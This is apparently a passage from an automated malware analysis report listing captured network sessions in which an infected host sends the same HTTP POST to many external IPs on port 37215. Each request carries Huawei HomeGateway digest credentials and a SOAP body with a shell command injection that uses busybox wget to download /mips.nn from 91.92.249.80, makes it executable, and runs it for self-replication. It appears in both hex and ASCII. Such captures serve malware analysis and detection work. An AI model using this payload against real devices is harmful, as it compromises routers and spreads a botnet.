[TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1570192.168.2.2353476197.206.137.1637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.496738911 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1571192.168.2.2343338111.150.117.14337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.496762991 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1572192.168.2.23592265.176.139.16737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.496778011 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1573192.168.2.234213641.23.105.15437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.496969938 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1574192.168.2.2352454197.178.212.17337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.496994019 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1575192.168.2.2333590157.153.184.5237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497021914 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1576192.168.2.235103841.73.181.15437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497101068 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1577192.168.2.2339534106.72.229.25337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497112036 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1578192.168.2.2351630197.203.85.12237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497173071 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1579192.168.2.2348372197.228.87.19737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497173071 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1580192.168.2.2354754176.67.203.537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497195959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
